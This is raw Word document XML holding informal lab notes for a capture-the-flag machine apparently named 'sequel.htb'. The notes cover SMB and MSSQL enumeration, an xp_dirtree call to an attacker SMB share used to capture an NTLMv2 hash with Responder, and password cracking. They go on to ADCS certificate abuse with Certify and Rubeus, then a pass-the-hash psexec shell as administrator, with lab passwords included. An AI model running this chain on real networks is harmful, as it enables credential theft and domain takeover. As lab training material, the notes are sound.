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054637E0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215090">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Escape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1565B69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AB0231">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in this lab, we will use the concepts of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AB0231"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 w:rsidR="00AB0231">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and when its port is closed then what else we can do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2D676E93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21509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15090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215090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215090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215090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215090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21509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6524AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t_</w:t>
      </w:r>
      <w:r w:rsidR="00215090">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006C27CD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540B27F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Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550D0602" w14:textId="0BF981DC" w:rsidR="008A7C44" w:rsidRDefault="008A7C44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crackmapexec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</w:t>
      </w:r>
      <w:r w:rsidR="00D264E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D264E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D264E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  =</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D264E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> name of serve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0122A0FE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crackmapexec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‘’ -p ‘’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2886E1A7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crackmapexec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‘’ -p ‘’ - -share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598B920B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/Public = to visit the public directory which we see in –shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6E952F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 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sqlxxxxxxxx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” and open it with open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xxxxxxpdf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F5E24DB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obtain 2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username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ryan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tom and the credentials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publicUser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it pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B8DE45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crackmapexec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publicUser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’ -p ‘paste’ = it + but not use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for everyone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0433C873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mssql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-local-auth -u ‘public’ -p ‘paste’ = we login and now -L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519D8CEA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mssqlclient.py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public:password@sequal.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2433BC22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help into it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC536FF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xp_dirtree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hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="003F526F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>\\10.10.14.56\fake\share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= here \fake\share is nothing just need to write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDBBBE2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another terminal responder -I tun0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBA2A1" w14:textId="357677CC" w:rsidR="00843DCE" w:rsidRDefault="00F0118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we obtain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sql_svc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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56557B66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save it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to .ntlmv</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286BDA36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n-US"/>
        </w:rPr>
        <w:t>hash.ntlmv</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2 rockyou.txt = REGGIE1234ronnie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9F2182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sql_svc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 -p ‘paste’ = and we login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06190395" w14:textId="17A79E48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evil-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sql_svc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paste </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AB2F9E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move certify.exe to the evil-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is there</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4E74A0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 = upload certify.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDCE8C2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./certify.exe find /vulnerable = to find any vulnerable templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDA0AA8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at c = cd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SQLServer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cd logs and type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errorlog.bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16D7A101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we notice that in that file we have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ryan.cooper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and another nuclearMosquito3 is fail to login but sometime we have 2 option to login and then we enter the password at login so we may think that it’s the password of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ryan.cooper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9487243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ryan.cooper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-p paste = and its login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B545872" w14:textId="77777777" w:rsidR="00F01188" w:rsidRDefault="00F01188" w:rsidP="00F011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we do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so do it = user.txt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27F5E5E8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./certify.exe find /vulnerable = we obtain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userauthentication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template is vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F81CC6D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users = to see users lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518C2E97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net user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ryan.cooper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= we see its domain users and the domain users is able we notice in vulnerable templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E42B27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./certify.exe request /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ca:dc.sequel.htb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>\sequel-DC-CA /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template:UserAuthentication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altname:administrator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= its mainly for provide the alternate name of administrator where we use that ticket which we use as authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115837E9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cer.pem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paste both and copy the last file to convert. for password hits enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006596BA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we have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rsa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private and regular certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54541012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evil-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-h = -c and -k is for that key to authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F96CB7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create 2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file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cert.pem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where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rsa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key.cert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with regular certification </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CC791A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evil-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-S -c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key.cert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-k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key.pem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sequel.htb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D4EC55F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mostly the port is not open so we cannot communicate with that evil-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</w:p>
    <w:p w14:paraId="71F688C7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netstat -an |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findstr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5986 = its closed so we cannot do evil-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</w:p>
    <w:p w14:paraId="19EA2E23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</w:p>
    <w:p w14:paraId="47F8A14C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we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Rubeus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2850BD5F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NetFramwork_4.7_any</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7DBA68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cp Rubeus.exe /home/kali/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bhavya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E64F9E7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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D3EFC1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upload Rubeus.exe and its downloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A19AF9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upload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cert.pfx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DC336D1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.\rubeus.exe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asktgt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user:administrator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certificate:C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:\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programdata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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cert.pfx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="751AF37F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have the ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FC4DD8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c:\users\administrator = its </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fail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because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its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not able to upload the certificate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4310F0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.\rubeus.exe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asktgt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user:administrator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certificate:C</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:\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programdata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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cert.pfx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getcredentials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/show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nowrap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it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>provide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us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ntlm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hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EDAD3E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crackmapexec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administrator -H paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571BE622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psexec.py -hashes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paste:paste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administrator@t_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6458928C" w14:textId="77777777" w:rsidR="00DF19AC" w:rsidRDefault="00DF19AC" w:rsidP="00DF19A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shell as administrator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63DA9E0E" w:rsidR="00A311DF" w:rsidRPr="00843DCE" w:rsidRDefault="00DF19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in Desktop of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>administrator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we obtain root.txt</w:t>
      </w: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24419"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="000C4870"/>
    <w:rsid w:val="000D5E56"/>
    <w:rsid w:val="000E208A"/>
    <w:rsid w:val="000F7C47"/>
    <w:rsid w:val="001159D6"/>
    <w:rsid w:val="00126267"/>
    <w:rsid w:val="0015299E"/>
    <w:rsid w:val="001778F2"/>
    <w:rsid w:val="00184BD1"/>
    <w:rsid w:val="001B5A21"/>
    <w:rsid w:val="001C21B9"/>
    <w:rsid w:val="00215090"/>
    <w:rsid w:val="00234237"/>
    <w:rsid w:val="00253E46"/>
    <w:rsid w:val="00280E0C"/>
    <w:rsid w:val="002A61C4"/>
    <w:rsid w:val="00327AFC"/>
    <w:rsid w:val="003628BF"/>
    <w:rsid w:val="0039551A"/>
    <w:rsid w:val="003C3F38"/>
    <w:rsid w:val="003E06D7"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00442342"/>
    <w:rsid w:val="00447170"/>
    <w:rsid w:val="004D5614"/>
    <w:rsid w:val="004E38B2"/>
    <w:rsid w:val="0060094A"/>
    <w:rsid w:val="006524AC"/>
    <w:rsid w:val="006C27CD"/>
    <w:rsid w:val="007264D5"/>
    <w:rsid w:val="00784B11"/>
    <w:rsid w:val="007A7619"/>
    <w:rsid w:val="008008CA"/>
    <w:rsid w:val="0081040F"/>
    <w:rsid w:val="00833D9E"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="008A7C44"/>
    <w:rsid w:val="008B4BD9"/>
    <w:rsid w:val="00991E72"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A80FC9"/>
    <w:rsid w:val="00A90E17"/>
    <w:rsid w:val="00AA325C"/>
    <w:rsid w:val="00AA6EAB"/>
    <w:rsid w:val="00AB0231"/>
    <w:rsid w:val="00B10731"/>
    <w:rsid w:val="00B33CBF"/>
    <w:rsid w:val="00B35A8F"/>
    <w:rsid w:val="00BA1C95"/>
    <w:rsid w:val="00BA2923"/>
    <w:rsid w:val="00C551E4"/>
    <w:rsid w:val="00C73CCB"/>
    <w:rsid w:val="00CB6B82"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00D264E5"/>
    <w:rsid w:val="00D55F47"/>
    <w:rsid w:val="00D625F4"/>
    <w:rsid w:val="00D74457"/>
    <w:rsid w:val="00D77666"/>
    <w:rsid w:val="00D83CF7"/>
    <w:rsid w:val="00DD148D"/>
    <w:rsid w:val="00DD7F25"/>
    <w:rsid w:val="00DF19AC"/>
    <w:rsid w:val="00E31457"/>
    <w:rsid w:val="00E36969"/>
    <w:rsid w:val="00E5601C"/>
    <w:rsid w:val="00E8178E"/>
    <w:rsid w:val="00E83AB5"/>
    <w:rsid w:val="00EA513A"/>
    <w:rsid w:val="00F01188"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00FF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EAB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\\10.10.14.56\fake\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67</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-22T15:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>